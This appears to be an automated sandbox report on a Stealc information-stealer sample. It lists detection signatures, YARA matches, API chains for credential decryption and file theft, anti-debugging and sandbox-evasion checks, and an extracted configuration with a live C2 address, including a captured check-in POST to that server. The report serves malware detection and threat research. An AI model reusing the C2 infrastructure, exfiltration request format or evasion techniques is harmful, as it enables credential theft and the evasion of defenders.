
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544215
MD5: 1f9bbfe42e611b314849010fb1bbe51c
SHA1: 5a25bc214ecb669fa11dc91c84c19e5d238125ba
SHA256: 0a348ff9b393249df44a77c30c8cef6cacc54f9f6d1fcf34bfb195cef3e455b4
Tags: exeuser-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1F9BBFE42E611B314849010FB1BBE51C)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1769403587.0000000005850000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 4408 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 4408 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.ea0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T04:01:10.465335+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.ea0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: http://185.215.113.206/6c4adf523b719729.php= | Virustotal: Detection: 16%
Source: http://185.215.113.206/6c4adf523b719729.php | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 40%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00EB9030
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00EA72A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00EAA2B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00EAA210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00EAC920
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EB40F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00EAE530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EB47C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EAF7B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EA1710
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EADB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00EADB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EB4B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EB3B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EABE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00EABE40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00EAEE20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EADF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EADF10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 44 39 30 33 34 32 42 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a
    Data Ascii:
        ------AAAKEBGDAFHIIDHIIECF
        Content-Disposition: form-data; name="hwid"

        0ED90342B485302599741
        ------AAAKEBGDAFHIIDHIIECF
        Content-Disposition: form-data; name="build"

        tale
        ------AAAKEBGDAFHIIDHIIECF--
Source: Joe Sandbox View | IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00EA62D0
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 44 39 30 33 34 32 42 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a
    Data Ascii:
        ------AAAKEBGDAFHIIDHIIECF
        Content-Disposition: form-data; name="hwid"

        0ED90342B485302599741
        ------AAAKEBGDAFHIIDHIIECF
        Content-Disposition: form-data; name="build"

        tale
        ------AAAKEBGDAFHIIDHIIECF--
Source: file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1812029198.0000000001C2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%.e
Source: file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
Source: file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=
Source: file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa~
Source: file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/hb5
Source: file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE0098 0_2_00EE0098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFB198 0_2_00EFB198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED2138 0_2_00ED2138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124C367 0_2_0124C367
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE4288 0_2_00EE4288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0E258 0_2_00F0E258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012FC214 0_2_012FC214
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1D39E 0_2_00F1D39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F02D6 0_2_012F02D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F2B308 0_2_00F2B308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012FA54D 0_2_012FA54D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012FE5C1 0_2_012FE5C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE45A8 0_2_00EE45A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0D5A8 0_2_00F0D5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC4573 0_2_00EC4573
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECE544 0_2_00ECE544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F296FD 0_2_00F296FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE66C8 0_2_00EE66C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012FF714 0_2_012FF714
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012EE76A 0_2_012EE76A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012507B6 0_2_012507B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1A648 0_2_00F1A648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F16799 0_2_00F16799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFD720 0_2_00EFD720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F8D6 0_2_00F0F8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F596A 0_2_012F596A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFB8A8 0_2_00EFB8A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F3962 0_2_012F3962
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF98B8 0_2_00EF98B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF4868 0_2_00EF4868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012839FE 0_2_012839FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01260870 0_2_01260870
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012E1B25 0_2_012E1B25
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A2B3E 0_2_012A2B3E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01302B6C 0_2_01302B6C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D6B7F 0_2_011D6B7F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012ECB4B 0_2_012ECB4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012D2B5A 0_2_012D2B5A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F8A0E 0_2_012F8A0E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F14BA8 0_2_00F14BA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F10B88 0_2_00F10B88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F1DA4 0_2_012F1DA4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1AC28 0_2_00F1AC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF4DC8 0_2_00EF4DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF5DB9 0_2_00EF5DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFBD68 0_2_00EFBD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED1D78 0_2_00ED1D78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0AD38 0_2_00F0AD38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11EE8 0_2_00F11EE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136AF7E 0_2_0136AF7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F6F55 0_2_012F6F55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE8E78 0_2_00EE8E78
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00EA4610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: oxrzanjf ZLIB complexity 0.9948995569099611
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00EB9790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00EB3970
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0VIKGQCP.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 40%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2149888 > 1048576
Source: file.exe | Static PE information: Raw size of oxrzanjf is bigger than: 0x100000 < 0x1a1e00
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ea0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;oxrzanjf:EW;lnkngpyb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;oxrzanjf:EW;lnkngpyb:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EB9BB0
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2111be should be: 0x20e0e3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: oxrzanjf
Source: file.exe | Static PE information: section name: lnkngpyb
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013EB13B push 66D45914h; mov dword ptr [esp], edi 0_2_013EB1A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECA0DC push eax; retf 0_2_00ECA0F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A311C push esi; mov dword ptr [esp], edx 0_2_012A3165
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A311C push 6BE129EAh; mov dword ptr [esp], ebx 0_2_012A318E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A311C push edx; mov dword ptr [esp], ebx 0_2_012A31F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A311C push ecx; mov dword ptr [esp], ebp 0_2_012A3207
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A311C push 49239DC7h; mov dword ptr [esp], edx 0_2_012A3239
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132215D push ebx; mov dword ptr [esp], ecx 0_2_01322181
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132215D push ebx; mov dword ptr [esp], ecx 0_2_013221CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132215D push edx; mov dword ptr [esp], eax 0_2_01322236
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01421132 push eax; mov dword ptr [esp], 00000004h 0_2_0142121A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F1E9 push 2B3DE0AEh; mov dword ptr [esp], edx 0_2_0128F1F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F1E9 push edx; mov dword ptr [esp], 7FF773C3h 0_2_0128F1F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F1E9 push 10720CBEh; mov dword ptr [esp], edi 0_2_0128F254
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F1E9 push 375BFACDh; mov dword ptr [esp], edi 0_2_0128F2A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F1E9 push ecx; mov dword ptr [esp], ebp 0_2_0128F2EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F1E9 push edi; mov dword ptr [esp], ecx 0_2_0128F316
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F1E9 push 79D7EA9Bh; mov dword ptr [esp], edi 0_2_0128F31E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F1E9 push ecx; mov dword ptr [esp], edi 0_2_0128F3B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013841E3 push 6DBE8AB2h; mov dword ptr [esp], ebp 0_2_0138422C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136F1C6 push ebp; mov dword ptr [esp], eax 0_2_0136F1E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECA106 push eax; retf 0_2_00ECA119
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013EE33B push 20509C29h; mov dword ptr [esp], edx 0_2_013EE3D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124C367 push eax; mov dword ptr [esp], ecx 0_2_0124C391
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124C367 push 2D3384FBh; mov dword ptr [esp], ebp 0_2_0124C3A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124C367 push ecx; mov dword ptr [esp], eax 0_2_0124C3AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124C367 push eax; mov dword ptr [esp], 1F65BE3Ch 0_2_0124C3DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124C367 push esi; mov dword ptr [esp], ebx 0_2_0124C3E7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124C367 push 5769B6CEh; mov dword ptr [esp], ebx 0_2_0124C40A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01398355 push 4C9A1A3Ch; mov dword ptr [esp], edi 0_2_0139837C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132E391 push 0BED477Dh; mov dword ptr [esp], edx 0_2_0132E351
Source: file.exe | Static PE information: section name: oxrzanjf entropy: 7.953822879686721

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
